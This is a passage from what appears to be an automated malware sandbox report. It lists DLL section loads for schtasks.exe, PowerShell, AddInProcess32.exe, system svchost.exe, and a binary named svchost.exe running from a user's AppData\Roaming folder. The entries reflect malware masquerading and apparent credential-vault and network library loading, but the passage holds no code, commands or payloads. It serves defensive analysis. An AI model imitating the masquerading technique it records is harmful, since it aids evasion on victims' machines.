                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
